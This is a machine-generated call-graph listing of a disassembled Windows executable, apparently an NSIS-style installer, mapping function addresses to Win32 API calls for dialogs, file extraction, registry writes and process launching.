3231 405ff6 2 API calls 3231->3233 3232->3226 3233->3226 3233->3228 3233->3231 3234 405835 2 API calls 3233->3234 3234->3228 3235->3186 3237 405842 3236->3237 3238 405853 3237->3238 3239 405847 CharPrevA 3237->3239 3238->3190 3239->3237 3239->3238 3240->3200 3268 406087 GetModuleHandleA 3241->3268 3244 405ab1 GetShortPathNameA 3246 405ac6 3244->3246 3247 405ba6 3244->3247 3246->3247 3249 405ace wsprintfA 3246->3249 3247->3220 3248 405a95 CloseHandle GetShortPathNameA 3248->3247 3250 405aa9 3248->3250 3251 405d1d 18 API calls 3249->3251 3250->3244 3250->3247 3252 405af6 3251->3252 3275 4059d2 GetFileAttributesA CreateFileA 3252->3275 3254 405b03 3254->3247 3255 405b12 GetFileSize GlobalAlloc 3254->3255 3256 405b30 ReadFile 3255->3256 3257 405b9f CloseHandle 3255->3257 3256->3257 3258 405b44 3256->3258 3257->3247 3258->3257 3276 405947 lstrlenA 3258->3276 3261 405bb3 3263 405947 4 API calls 3261->3263 3262 405b59 3281 405cfb lstrcpynA 3262->3281 3265 405b67 3263->3265 3266 405b7a SetFilePointer WriteFile GlobalFree 3265->3266 3266->3257 3267->3223 3269 4060a3 3268->3269 3270 4060ad GetProcAddress 3268->3270 3282 40601d GetSystemDirectoryA 3269->3282 3273 405a54 3270->3273 3272 4060a9 3272->3270 3272->3273 3273->3244 3273->3247 3274 4059d2 GetFileAttributesA CreateFileA 3273->3274 3274->3248 3275->3254 3277 40597d lstrlenA 3276->3277 3278 40595b lstrcmpiA 3277->3278 3280 405987 3277->3280 3279 405974 CharNextA 3278->3279 3278->3280 3279->3277 3280->3261 3280->3262 3281->3265 3283 40603f wsprintfA LoadLibraryA 3282->3283 3283->3272 3670 4025e2 3671 4025e9 3670->3671 3673 40284e 3670->3673 3672 4029ef 18 API calls 3671->3672 3674 4025f4 3672->3674 3675 4025fb SetFilePointer 3674->3675 3675->3673 3676 40260b 3675->3676 3678 405c59 wsprintfA 3676->3678 3678->3673 3679 403ae4 3680 403c37 3679->3680 3681 403afc 3679->3681 3682 403c88 3680->3682 3683 403c48 GetDlgItem GetDlgItem 3680->3683 3681->3680 3684 403b08 3681->3684 3688 403ce2 3682->3688 3696 401389 2 API calls 3682->3696 3764 403fb7 3683->3764 3685 403b13 SetWindowPos 3684->3685 3686 403b26 3684->3686 3685->3686 3689 403b43 3686->3689 3690 403b2b ShowWindow 3686->3690 3692 404003 SendMessageA 3688->3692 3738 403c32 3688->3738 3693 403b65 3689->3693 3694 403b4b DestroyWindow 3689->3694 3690->3689 3691 403c72 SetClassLongA 3695 40140b 2 API calls 3691->3695 3736 403cf4 3692->3736 3697 403b6a SetWindowLongA 3693->3697 3698 403b7b 3693->3698 3746 403f40 3694->3746 3695->3682 3699 403cba 3696->3699 3697->3738 3702 403b87 GetDlgItem 3698->3702 3715 403bf2 3698->3715 3699->3688 3703 403cbe SendMessageA 3699->3703 3700 40140b 2 API calls 3700->3736 3701 403f42 DestroyWindow EndDialog 3701->3746 3705 403b9a SendMessageA IsWindowEnabled 3702->3705 3708 403bb7 3702->3708 3703->3738 3704 403f71 ShowWindow 3704->3738 3705->3708 3705->3738 3707 405d1d 18 API calls 3707->3736 3709 403bc4 3708->3709 3710 403bd7 3708->3710 3711 403c0b SendMessageA 3708->3711 3719 403bbc 3708->3719 3709->3711 3709->3719 3713 403bf4 3710->3713 3714 403bdf 3710->3714 3711->3715 3717 40140b 2 API calls 3713->3717 3716 40140b 2 API calls 3714->3716 3750 40401e 3715->3750 3716->3719 3717->3719 3718 403fb7 19 API calls 3718->3736 3719->3715 3747 403f90 3719->3747 3720 403fb7 19 API calls 3721 403d6f GetDlgItem 3720->3721 3722 403d84 3721->3722 3723 403d8c ShowWindow EnableWindow 3721->3723 3722->3723 3767 403fd9 EnableWindow 3723->3767 3725 403db6 EnableWindow 3728 403dca 3725->3728 3726 403dcf GetSystemMenu EnableMenuItem SendMessageA 3727 403dff SendMessageA 3726->3727 3726->3728 3727->3728 3728->3726 3768 403fec SendMessageA 3728->3768 3769 405cfb lstrcpynA 3728->3769 3731 403e2d lstrlenA 3732 405d1d 18 API calls 3731->3732 3733 403e3e SetWindowTextA 3732->3733 3734 401389 2 API calls 3733->3734 3734->3736 3735 403e82 DestroyWindow 3737 403e9c CreateDialogParamA 3735->3737 3735->3746 3736->3700 3736->3701 3736->3707 3736->3718 3736->3720 3736->3735 3736->3738 3739 403ecf 3737->3739 3737->3746 3740 403fb7 19 API calls 3739->3740 3741 403eda GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3740->3741 3742 401389 2 API calls 3741->3742 3743 403f20 3742->3743 3743->3738 3744 403f28 ShowWindow 3743->3744 3745 404003 SendMessageA 3744->3745 3745->3746 3746->3704 3746->3738 3748 403f97 3747->3748 3749 403f9d SendMessageA 3747->3749 3748->3749 3749->3715 3751 4040bf 3750->3751 3752 404036 GetWindowLongA 3750->3752 3751->3738 3752->3751 3753 404047 3752->3753 3754 404056 GetSysColor 3753->3754 3755 404059 3753->3755 3754->3755 3756 404069 SetBkMode 3755->3756 3757 40405f SetTextColor 3755->3757 3758 404081 GetSysColor 3756->3758 3759 404087 3756->3759 3757->3756 3758->3759 3760 404098 3759->3760 3761 40408e SetBkColor 3759->3761 3760->3751 3762 4040b2 CreateBrushIndirect 3760->3762 3763 4040ab DeleteObject 3760->3763 3761->3760 3762->3751 3763->3762 3765 405d1d 18 API calls 3764->3765 3766 403fc2 SetDlgItemTextA 3765->3766 3766->3691 3767->3725 3768->3728 3769->3731 3770 401ae5 3771 402a0c 18 API calls 3770->3771 3772 401aec 3771->3772 3773 4029ef 18 API calls 3772->3773 3774 401af5 wsprintfA 3773->3774 3775 4028a1 3774->3775 3776 4019e6 3777 402a0c 18 API calls 3776->3777 3778 4019ef ExpandEnvironmentStringsA 3777->3778 3779 401a03 3778->3779 3781 401a16 3778->3781 3780 401a08 lstrcmpA 3779->3780 3779->3781 3780->3781 3782 401f67 3783 401f79 3782->3783 3792 402028 3782->3792 3784 402a0c 18 API calls 3783->3784 3785 401f80 3784->3785 3787 402a0c 18 API calls 3785->3787 3786 401423 25 API calls 3793 40217f 3786->3793 3788 401f89 3787->3788 3789 401f91 GetModuleHandleA 3788->3789 3790 401f9e LoadLibraryExA 3788->3790 3789->3790 3791 401fae GetProcAddress 3789->3791 3790->3791 3790->3792 3794 401ffb 3791->3794 3795 401fbe 3791->3795 3792->3786 3796 404fe7 25 API calls 3794->3796 3797 401423 25 API calls 3795->3797 3798 401fce 3795->3798 3796->3798 3797->3798 3798->3793 3799 40201c FreeLibrary 3798->3799 3799->3793 3814 401c6d 3815 4029ef 18 API calls 3814->3815 3816 401c73 IsWindow 3815->3816 3817 4019d6 3816->3817 3818 4014f0 SetForegroundWindow 3819 4028a1 3818->3819 3827 4043f5 3828 404421 3827->3828 3829 404432 3827->3829 3888 4055a0 GetDlgItemTextA 3828->3888 3830 40443e GetDlgItem 3829->3830 3837 40449d 3829->3837 3832 404452 3830->3832 3836 404466 SetWindowTextA 3832->3836 3840 405882 4 API calls 3832->3840 3833 404581 3886 40472b 3833->3886 3890 4055a0 GetDlgItemTextA 3833->3890 3834 40442c 3835 405f5d 5 API calls 3834->3835 3835->3829 3841 403fb7 19 API calls 3836->3841 3837->3833 3842 405d1d 18 API calls 3837->3842 3837->3886 3839 40401e 8 API calls 3844 40473f 3839->3844 3845 40445c 3840->3845 3846 404482 3841->3846 3847 404511 SHBrowseForFolderA 3842->3847 3843 4045b1 3848 4058cf 18 API calls 3843->3848 3845->3836 3852 4057ee 3 API calls 3845->3852 3849 403fb7 19 API calls 3846->3849 3847->3833 3850 404529 CoTaskMemFree 3847->3850 3851 4045b7 3848->3851 3853 404490 3849->3853 3854 4057ee 3 API calls 3850->3854 3891 405cfb lstrcpynA 3851->3891 3852->3836 3889 403fec SendMessageA 3853->3889 3857 404536 3854->3857 3859 40456d SetDlgItemTextA 3857->3859 3863 405d1d 18 API calls 3857->3863 3858 404496 3861 406087 5 API calls 3858->3861 3859->3833 3860 4045ce 3862 406087 5 API calls 3860->3862 3861->3837 3864 4045d5 3862->3864 3865 404555 lstrcmpiA 3863->3865 3866 404611 3864->3866 3874 405835 2 API calls 3864->3874 3875 404669 3864->3875 3865->3859 3867 404566 lstrcatA 3865->3867 3892 405cfb lstrcpynA 3866->3892 3867->3859 3869 404618 3870 405882 4 API calls 3869->3870 3871 40461e GetDiskFreeSpaceA 3870->3871 3873 404642 MulDiv 3871->3873 3871->3875 3873->3875 3874->3864 3876 4046da 3875->3876 3893 404871 3875->3893 3878 4046fd 3876->3878 3880 40140b 2 API calls 3876->3880 3904 403fd9 EnableWindow 3878->3904 3880->3878 3881 4046dc SetDlgItemTextA 3881->3876 3882 4046cc 3896 4047ac 3882->3896 3885 404719 3885->3886 3905 40438a 3885->3905 3886->3839 3888->3834 3889->3858 3890->3843 3891->3860 3892->3869 3894 4047ac 21 API calls 3893->3894 3895 4046c7 3894->3895 3895->3881 3895->3882 3897 4047c2 3896->3897 3898 405d1d 18 API calls 3897->3898 3899 404826 3898->3899 3900 405d1d 18 API calls 3899->3900 3901 404831 3900->3901 3902 405d1d 18 API calls 3901->3902 3903 404847 lstrlenA wsprintfA SetDlgItemTextA 3902->3903 3903->3876 3904->3885 3906 404398 3905->3906 3907 40439d SendMessageA 3905->3907 3906->3907 3907->3886 3908 4016fa 3909 402a0c 18 API calls 3908->3909 3910 401701 SearchPathA 3909->3910 3911 40171c 3910->3911 3913 4027cc 3910->3913 3911->3913 3914 405cfb lstrcpynA 3911->3914 3914->3913 3915 40287c SendMessageA 3916 4028a1 3915->3916 3917 402896 InvalidateRect 3915->3917 3917->3916 3918 40227d 3919 402a0c 18 API calls 3918->3919 3920 40228b 3919->3920 3921 402a0c 18 API calls 3920->3921 3922 402294 3921->3922 3923 402a0c 18 API calls 3922->3923 3924 40229e GetPrivateProfileStringA 3923->3924 3925 4014fe 3926 401506 3925->3926 3928 401519 3925->3928 3927 4029ef 18 API calls 3926->3927 3927->3928 3936 4040ff 3937 404115 3936->3937 3942 404222 3936->3942 3939 403fb7 19 API calls 3937->3939 3938 404291 3940 404365 3938->3940 3941 40429b GetDlgItem 3938->3941 3943 40416b 3939->3943 3946 40401e 8 API calls 3940->3946 3947 4042b1 3941->3947 3948 404323 3941->3948 3942->3938 3942->3940 3944 404266 GetDlgItem SendMessageA 3942->3944 3945 403fb7 19 API calls 3943->3945 3967 403fd9 EnableWindow 3944->3967 3950 404178 CheckDlgButton 3945->3950 3951 404360 3946->3951 3947->3948 3952 4042d7 6 API calls 3947->3952 3948->3940 3953 404335 3948->3953 3965 403fd9 EnableWindow 3950->3965 3952->3948 3956 40433b SendMessageA 3953->3956 3957 40434c 3953->3957 3954 40428c 3958 40438a SendMessageA 3954->3958 3956->3957 3957->3951 3960 404352 SendMessageA 3957->3960 3958->3938 3959 404196 GetDlgItem 3966 403fec SendMessageA 3959->3966 3960->3951 3962 4041ac SendMessageA 3963 4041d3 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3962->3963 3964 4041ca GetSysColor 3962->3964 3963->3951 3964->3963 3965->3959 3966->3962 3967->3954 3968 401000 3969 401037 BeginPaint GetClientRect 3968->3969 3971 40100c DefWindowProcA 3968->3971 3972 4010f3 3969->3972 3973 401179 3971->3973 3974 401073 CreateBrushIndirect FillRect DeleteObject 3972->3974 3975 4010fc 3972->3975 3974->3972 3976 401102 CreateFontIndirectA 3975->3976 3977 401167 EndPaint 3975->3977 3976->3977 3978 401112 6 API calls 3976->3978 3977->3973 3978->3977 3979 402188 3980 402a0c 18 API calls 3979->3980 3981 40218e 3980->3981 3982 402a0c 18 API calls 3981->3982 3983 402197 3982->3983 3984 402a0c 18 API calls 3983->3984 3985 4021a0 3984->3985 3986 405ff6 2 API calls 3985->3986 3987 4021a9 3986->3987 3988 4021ba lstrlenA lstrlenA 3987->3988 3989 4021ad 3987->3989 3991 404fe7 25 API calls 3988->3991 3990 404fe7 25 API calls 3989->3990 3993 4021b5 3989->3993 3990->3993 3992 4021f6 SHFileOperationA 3991->3992 3992->3989 3992->3993 3142 401389 3144 401390 3142->3144 3143 4013fe 3144->3143 3145 4013cb MulDiv SendMessageA 3144->3145 3145->3144 3994 40220a 3995 402211 3994->3995 3998 402224 3994->3998 3996 405d1d 18 API calls 3995->3996 3997 40221e 3996->3997 3999 4055bc MessageBoxIndirectA 3997->3999 3999->3998 4000 401c8a 4001 4029ef 18 API calls 4000->4001 4002 401c91 4001->4002 4003 4029ef 18 API calls 4002->4003 4004 401c99 GetDlgItem 4003->4004 4005 4024ce 4004->4005 4006 40370c 4007 403717 4006->4007 4008 40371e GlobalAlloc 4007->4008 4009 40371b 4007->4009 4008->4009 4010 401490 4011 404fe7 25 API calls 4010->4011 4012 401497 4011->4012 4013 402611 4014 402618 4013->4014 4016 4028a1 4013->4016 4015 40261e FindClose 4014->4015 4015->4016 4017 402692 4018 402a0c 18 API calls 4017->4018 4020 4026a0 4018->4020 4019 4026b6 4022 4059b3 2 API calls 4019->4022 4020->4019 4021 402a0c 18 API calls 4020->4021 4021->4019 4023 4026bc 4022->4023 4043 4059d2 GetFileAttributesA CreateFileA 4023->4043 4025 4026c9 4026 402772 4025->4026 4027 4026d5 GlobalAlloc 4025->4027 4030 40277a DeleteFileA 4026->4030 4031 40278d 4026->4031 4028 402769 CloseHandle 4027->4028 4029 4026ee 4027->4029 4028->4026 4044 403207 SetFilePointer 4029->4044 4030->4031 4033 4026f4 4034 4031d5 ReadFile 4033->4034 4035 4026fd GlobalAlloc 4034->4035 4036 402741 WriteFile GlobalFree 4035->4036 4037 40270d 4035->4037 4039 402f2e 48 API calls 4036->4039 4038 402f2e 48 API calls 4037->4038 4042 40271a 4038->4042 4040 402766 4039->4040 4040->4028 4041 402738 GlobalFree 4041->4036 4042->4041 4043->4025 4044->4033 4045 401595 4046 402a0c 18 API calls 4045->4046 4047 40159c SetFileAttributesA 4046->4047 4048 4015ae 4047->4048 4049 401e95 4050 402a0c 18 API calls 4049->4050 4051 401e9c 4050->4051 4052 405ff6 2 API calls 4051->4052 4053 401ea2 4052->4053 4055 401eb4 4053->4055 4056 405c59 wsprintfA 4053->4056 4056->4055 4057 401696 4058 402a0c 18 API calls 4057->4058 4059 40169c GetFullPathNameA 4058->4059 4060 4016b3 4059->4060 4066 4016d4 4059->4066 4063 405ff6 2 API calls 4060->4063 4060->4066 4061 4028a1 4062 4016e8 GetShortPathNameA 4062->4061 4064 4016c4 4063->4064 4064->4066 4067 405cfb lstrcpynA 4064->4067 4066->4061 4066->4062 4067->4066 4075 402319 4076 40231f 4075->4076 4077 402a0c 18 API calls 4076->4077 4078 402331 4077->4078 4079 402a0c 18 API calls 4078->4079 4080 40233b RegCreateKeyExA 4079->4080 4081 4028a1 4080->4081 4082 402365 4080->4082 4083 40237d 4082->4083 4084 402a0c 18 API calls 4082->4084 4085 402389 4083->4085 4087 4029ef 18 API calls 4083->4087 4086 402376 lstrlenA 4084->4086 4088 4023a4 RegSetValueExA 4085->4088 4089 402f2e 48 API calls 4085->4089 4086->4083 4087->4085 4090 4023ba RegCloseKey 4088->4090 4089->4088 4090->4081 4092 402819 4093 4029ef 18 API calls 4092->4093 4094 40281f 4093->4094 4095 402672 4094->4095 4096 402850 4094->4096 4097 40282d 4094->4097 4096->4095 4098 405d1d 18 API calls 4096->4098 4097->4095 4100 405c59 wsprintfA 4097->4100 4098->4095 4100->4095 3146 401e1b 3147 402a0c 18 API calls 3146->3147 3148 401e21 3147->3148 3149 404fe7 25 API calls 3148->3149 3150 401e2b 3149->3150 3162 40555b CreateProcessA 3150->3162 3152 402672 3153 401e87 CloseHandle 3153->3152 3154 401e50 WaitForSingleObject 3155 401e31 3154->3155 3156 401e5e GetExitCodeProcess 3154->3156 3155->3152 3155->3153 3155->3154 3159 4060c3 2 API calls 3155->3159 3157 401e70 3156->3157 3158 401e7b 3156->3158 3165 405c59 wsprintfA 3157->3165 3158->3153 3161 401e79 3158->3161 3159->3154 3161->3153 3163 405596 3162->3163 3164 40558a CloseHandle 3162->3164 3163->3155 3164->3163 3165->3161 4101 401d1b GetDC GetDeviceCaps 4102 4029ef 18 API calls 4101->4102 4103 401d37 MulDiv 4102->4103 4104 4029ef 18 API calls 4103->4104 4105 401d4c 4104->4105 4106 405d1d 18 API calls 4105->4106 4107 401d85 CreateFontIndirectA 4106->4107 4108 4024ce 4107->4108 4108->4108 4109 40251c 4110 4029ef 18 API calls 4109->4110 4111 402526 4110->4111 4112 40255a ReadFile 4111->4112 4113 40259e 4111->4113 4115 4025ae 4111->4115 4117 40259c 4111->4117 4112->4111 4112->4117 4118 405c59 wsprintfA 4113->4118 4116 4025c4 SetFilePointer 4115->4116 4115->4117 4116->4117 4118->4117 2933 401721 2939 402a0c 2933->2939 2937 40172f 2938 405a01 2 API calls 2937->2938 2938->2937 2940 402a18 2939->2940 2949 405d1d 2940->2949 2943 401728 2945 405a01 2943->2945 2946 405a0c GetTickCount GetTempFileNameA 2945->2946 2947 405a3c 2946->2947 2948 405a38 2946->2948 2947->2937 2948->2946 2948->2947 2959 405d2a 2949->2959 2950 405f44 2951 402a39 2950->2951 2984 405cfb lstrcpynA 2950->2984 2951->2943 2968 405f5d 2951->2968 2953 405dc2 GetVersion 2954 405dcf 2953->2954 2954->2959 2961 405e3a GetSystemDirectoryA 2954->2961 2962 405e4d GetWindowsDirectoryA 2954->2962 2964 405d1d 10 API calls 2954->2964 2965 405ec4 lstrcatA 2954->2965 2966 405e81 SHGetSpecialFolderLocation 2954->2966 2977 405be2 RegOpenKeyExA 2954->2977 2955 405f1b lstrlenA 2955->2959 2958 405d1d 10 API calls 2958->2955 2959->2950 2959->2953 2959->2955 2959->2958 2963 405f5d 5 API calls 2959->2963 2982 405c59 wsprintfA 2959->2982 2983 405cfb lstrcpynA 2959->2983 2961->2954 2962->2954 2963->2959 2964->2954 2965->2959 2966->2954 2967 405e99 SHGetPathFromIDListA CoTaskMemFree 2966->2967 2967->2954 2974 405f69 2968->2974 2969 405fd1 2970 405fd5 CharPrevA 2969->2970 2973 405ff0 2969->2973 2970->2969 2971 405fc6 CharNextA 2971->2969 2971->2974 2973->2943 2974->2969 2974->2971 2975 405fb4 CharNextA 2974->2975 2976 405fc1 CharNextA 2974->2976 2985 405819 2974->2985 2975->2974 2976->2971 2978 405c53 2977->2978 2979 405c15 RegQueryValueExA 2977->2979 2978->2954 2980 405c36 RegCloseKey 2979->2980 2980->2978 2982->2959 2983->2959 2984->2951 2986 40581f 2985->2986 2987 405832 2986->2987 2988 405825 CharNextA 2986->2988 2987->2974 2988->2986 4119 401922 4120 402a0c 18 API calls 4119->4120 4121 401929 lstrlenA 4120->4121 4122 4024ce 4121->4122 4123 405125 4124 4052d1 4123->4124 4125 405146 GetDlgItem GetDlgItem GetDlgItem 4123->4125 4127 405302 4124->4127 4128 4052da GetDlgItem CreateThread CloseHandle 4124->4128 4169 403fec SendMessageA 4125->4169 4130 40532d 4127->4130 4131 405319 ShowWindow ShowWindow 4127->4131 4132 40534f 4127->4132 4128->4127 4129 4051b7 4135 4051be GetClientRect GetSystemMetrics SendMessageA SendMessageA 4129->4135 4133 40538b 4130->4133 4137 405364 ShowWindow 4130->4137 4138 40533e 4130->4138 4171 403fec SendMessageA 4131->4171 4134 40401e 8 API calls 4132->4134 4133->4132 4143 405396 SendMessageA 4133->4143 4149 40535d 4134->4149 4141 405211 SendMessageA SendMessageA 4135->4141 4142 40522d 4135->4142 4139 405384 4137->4139 4140 405376 4137->4140 4144 403f90 SendMessageA 4138->4144 4146 403f90 SendMessageA 4139->4146 4145 404fe7 25 API calls 4140->4145 4141->4142 4147 405240 4142->4147 4148 405232 SendMessageA 4142->4148 4143->4149 4150 4053af CreatePopupMenu 4143->4150 4144->4132 4145->4139 4146->4133 4152 403fb7 19 API calls 4147->4152 4148->4147 4151 405d1d 18 API calls 4150->4151 4153 4053bf AppendMenuA 4151->4153 4154 405250 4152->4154 4155 4053d2 GetWindowRect 4153->4155 4156 4053e5 4153->4156 4157 405259 ShowWindow 4154->4157 4158 40528d GetDlgItem SendMessageA 4154->4158 4159 4053ee TrackPopupMenu 4155->4159 4156->4159 4160 40527c 4157->4160 4161 40526f ShowWindow 4157->4161 4158->4149 4162 4052b4 SendMessageA SendMessageA 4158->4162 4159->4149 4163 40540c 4159->4163 4170 403fec SendMessageA 4160->4170 4161->4160 4162->4149 4164 405428 SendMessageA 4163->4164 4164->4164 4166 405445 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4164->4166 4167 405467 SendMessageA 4166->4167 4167->4167 4168 405488 GlobalUnlock SetClipboardData CloseClipboard 4167->4168 4168->4149 4169->4129 4170->4158 4171->4130 4172 401ca5 4173 4029ef 18 API calls 4172->4173 4174 401cb5 SetWindowLongA 4173->4174 4175 4028a1 4174->4175 4176 401a26 4177 4029ef 18 API calls 4176->4177 4178 401a2c 4177->4178 4179 4029ef 18 API calls 4178->4179 4180 4019d6 4179->4180 4181 406a26 4184 4061b7 4181->4184 4182 406241 GlobalAlloc 4182->4184 4185 406b22 4182->4185 4183 406238 GlobalFree 4183->4182 4184->4182 4184->4183 4184->4184 4184->4185 4186 4062b8 GlobalAlloc 4184->4186 4187 4062af GlobalFree 4184->4187 4186->4184 4186->4185 4187->4186 4188 40262b 4189 402646 4188->4189 4190 40262e 4188->4190 4191 4027cc 4189->4191 4194 405cfb lstrcpynA 4189->4194 4192 40263b FindNextFileA 4190->4192 4192->4189 4194->4191 4195 401bad 4196 4029ef 18 API calls 4195->4196 4197 401bb4 4196->4197 4198 4029ef 18 API calls 4197->4198 4199 401bbe 4198->4199 4200 401bce 4199->4200 4201 402a0c 18 API calls 4199->4201 4202 401bde 4200->4202 4203 402a0c 18 API calls 4200->4203 4201->4200 4204 401be9 4202->4204 4205 401c2d 4202->4205 4203->4202 4207 4029ef 18 API calls 4204->4207 4206 402a0c 18 API calls 4205->4206 4209 401c32 4206->4209 4208 401bee 4207->4208 4210 4029ef 18 API calls 4208->4210 4211 402a0c 18 API calls 4209->4211 4212 401bf7 4210->4212 4213 401c3b FindWindowExA 4211->4213 4214 401c1d SendMessageA 4212->4214 4215 401bff SendMessageTimeoutA 4212->4215 4216 401c59 4213->4216 4214->4216 4215->4216 4217 4043ae 4218 4043e4 4217->4218 4219 4043be 4217->4219 4221 40401e 8 API calls 4218->4221 4220 403fb7 19 API calls 4219->4220 4222 4043cb SetDlgItemTextA 4220->4222 4223 4043f0 4221->4223 4222->4218 4224 4024b2 4225 402a0c 18 API calls 4224->4225 4226 4024b9 4225->4226 4229 4059d2 GetFileAttributesA CreateFileA 4226->4229 4228 4024c5 4229->4228 2989 4015b3 2990 402a0c 18 API calls 2989->2990 2991 4015ba 2990->2991 3007 405882 CharNextA CharNextA 2991->3007 2993 4015c2 2994 40160a 2993->2994 2995 405819 CharNextA 2993->2995 2996 40162d 2994->2996 2997 40160f 2994->2997 2998 4015d0 CreateDirectoryA 2995->2998 3001 401423 25 API calls 2996->3001 3013 401423 2997->3013 2998->2993 3000 4015e5 GetLastError 2998->3000 3000->2993 3003 4015f2 GetFileAttributesA 3000->3003 3006 40217f 3001->3006 3003->2993 3005 401621 SetCurrentDirectoryA 3005->3006 3008 4058a8 3007->3008 3009 40589c 3007->3009 3011 405819 CharNextA 3008->3011 3012 4058c5 3008->3012 3009->3008 3010 4058a3 CharNextA 3009->3010 3010->3012 3011->3008 3012->2993 3017 404fe7 3013->3017 3016 405cfb lstrcpynA 3016->3005 3018 401431 3017->3018 3019 405002 3017->3019 3018->3016 3020 40501f lstrlenA 3019->3020 3021 405d1d 18 API calls 3019->3021 3022 405048 3020->3022 3023 40502d lstrlenA 3020->3023 3021->3020 3025 40505b 3022->3025 3026 40504e SetWindowTextA 3022->3026 3023->3018 3024 40503f lstrcatA 3023->3024 3024->3022 3025->3018 3027 405061 SendMessageA SendMessageA SendMessageA 3025->3027 3026->3025 3027->3018 4230 406333 4232 4061b7 4230->4232 4231 406b22 4232->4231 4233 406241 GlobalAlloc 4232->4233 4234 406238 GlobalFree 4232->4234 4235 4062b8 GlobalAlloc 4232->4235 4236 4062af GlobalFree 4232->4236 4233->4231 4233->4232 4234->4233 4235->4231 4235->4232 4236->4235 3028 401734 3029 402a0c 18 API calls 3028->3029 3030 40173b 3029->3030 3031 401761 3030->3031 3032 401759 3030->3032 3083 405cfb lstrcpynA 3031->3083 3082 405cfb lstrcpynA 3032->3082 3035 40175f 3039 405f5d 5 API calls 3035->3039 3036 40176c 3084 4057ee lstrlenA CharPrevA 3036->3084 3058 40177e 3039->3058 3043 401795 CompareFileTime 3043->3058 3044 401859 3045 404fe7 25 API calls 3044->3045 3048 401863 3045->3048 3046 404fe7 25 API calls 3054 401845 3046->3054 3047 405cfb lstrcpynA 3047->3058 3067 402f2e 3048->3067 3051 40188a SetFileTime 3052 40189c FindCloseChangeNotification 3051->3052 3052->3054 3055 4018ad 3052->3055 3053 405d1d 18 API calls 3053->3058 3056 4018b2 3055->3056 3057 4018c5 3055->3057 3059 405d1d 18 API calls 3056->3059 3060 405d1d 18 API calls 3057->3060 3058->3043 3058->3044 3058->3047 3058->3053 3065 401830 3058->3065 3066 4059d2 GetFileAttributesA CreateFileA 3058->3066 3087 405ff6 FindFirstFileA 3058->3087 3090 4059b3 GetFileAttributesA 3058->3090 3093 4055bc 3058->3093 3062 4018ba lstrcatA 3059->3062 3063 4018cd 3060->3063 3062->3063 3064 4055bc MessageBoxIndirectA 3063->3064 3064->3054 3065->3046 3065->3054 3066->3058 3068 402f5b 3067->3068 3069 402f3f SetFilePointer 3067->3069 3097 403059 GetTickCount 3068->3097 3069->3068 3072 402f6c ReadFile 3073 402f8c 3072->3073 3081 401876 3072->3081 3074 403059 43 API calls 3073->3074 3073->3081 3075 402fa3 3074->3075 3076 40301e ReadFile 3075->3076 3079 402fb3 3075->3079 3075->3081 3076->3081 3078 402fce ReadFile 3078->3079 3078->3081 3079->3078 3080 402fe7 WriteFile 3079->3080 3079->3081 3080->3079 3080->3081 3081->3051 3081->3052 3082->3035 3083->3036 3085 401772 lstrcatA 3084->3085 3086 405808 lstrcatA 3084->3086 3085->3035 3086->3085 3088 406017 3087->3088 3089 40600c FindClose 3087->3089 3088->3058 3089->3088 3091 4059c2 SetFileAttributesA 3090->3091 3092 4059cf 3090->3092 3091->3092 3092->3058 3096 4055d1 3093->3096 3094 40561d 3094->3058 3095 4055e5 MessageBoxIndirectA 3095->3094 3096->3094 3096->3095 3098 4031c3 3097->3098 3099 403088 3097->3099 3100 402be9 33 API calls 3098->3100 3110 403207 SetFilePointer 3099->3110 3107 402f64 3100->3107 3102 403093 SetFilePointer 3106 4030b8 3102->3106 3106->3107 3108 40314d WriteFile 3106->3108 3109 4031a4 SetFilePointer 3106->3109 3111 4031d5 ReadFile 3106->3111 3113 406184 3106->3113 3120 402be9 3106->3120 3107->3072 3107->3081 3108->3106 3108->3107 3109->3098 3110->3102 3112 4031f6 3111->3112 3112->3106 3114 4061a9 3113->3114 3115 4061b1 3113->3115 3114->3106 3115->3114 3116 406241 GlobalAlloc 3115->3116 3117 406238 GlobalFree 3115->3117 3118 4062b8 GlobalAlloc 3115->3118 3119 4062af GlobalFree 3115->3119 3116->3114 3116->3115 3117->3116 3118->3114 3118->3115 3119->3118 3121 402bf7 3120->3121 3122 402c0f 3120->3122 3123 402c00 DestroyWindow 3121->3123 3124 402c07 3121->3124 3125 402c17 3122->3125 3126 402c1f GetTickCount 3122->3126 3123->3124 3124->3106 3135 4060c3 3125->3135 3126->3124 3128 402c2d 3126->3128 3129 402c62 CreateDialogParamA ShowWindow 3128->3129 3130 402c35 3128->3130 3129->3124 3130->3124 3139 402bcd 3130->3139 3132 402c43 wsprintfA 3133 404fe7 25 API calls 3132->3133 3134 402c60 3133->3134 3134->3124 3136 4060e0 PeekMessageA 3135->3136 3137 4060f0 3136->3137 3138 4060d6 DispatchMessageA 3136->3138 3137->3124 3138->3136 3140 402bdc 3139->3140 3141 402bde MulDiv 3139->3141 3140->3141 3141->3132 4237 401634 4238 402a0c 18 API calls 4237->4238 4239 40163a 4238->4239 4240 405ff6 2 API calls 4239->4240 4241 401640 4240->4241 4242 401934 4243 4029ef 18 API calls 4242->4243 4244 40193b 4243->4244 4245 4029ef 18 API calls 4244->4245 4246 401945 4245->4246 4247 402a0c 18 API calls 4246->4247 4248 40194e 4247->4248 4249 401961 lstrlenA 4248->4249 4253 40199c 4248->4253 4250 40196b 4249->4250 4250->4253 4255 405cfb lstrcpynA 4250->4255 4252 401985 4252->4253 4254 401992 lstrlenA 4252->4254 4254->4253 4255->4252 4256 4019b5 4257 402a0c 18 API calls 4256->4257 4258 4019bc 4257->4258 4259 402a0c 18 API calls 4258->4259 4260 4019c5 4259->4260 4261 4019cc lstrcmpiA 4260->4261 4262 4019de lstrcmpA 4260->4262 4263 4019d2 4261->4263 4262->4263 4264 404936 GetDlgItem GetDlgItem 4265 40498a 7 API calls 4264->4265 4268 404ba7 4264->4268 4266 404a30 DeleteObject 4265->4266 4267 404a23 SendMessageA 4265->4267 4269 404a3b 4266->4269 4267->4266 4287 404c91 4268->4287 4296 404c1b 4268->4296 4317 4048b6 SendMessageA 4268->4317 4270 404a72 4269->4270 4271 405d1d 18 API calls 4269->4271 4272 403fb7 19 API calls 4270->4272 4275 404a54 SendMessageA SendMessageA 4271->4275 4278 404a86 4272->4278 4273 404d40 4276 404d55 4273->4276 4277 404d49 SendMessageA 4273->4277 4274 404b9a 4280 40401e 8 API calls 4274->4280 4275->4269 4288 404d67 ImageList_Destroy 4276->4288 4289 404d6e 4276->4289 4293 404d7e 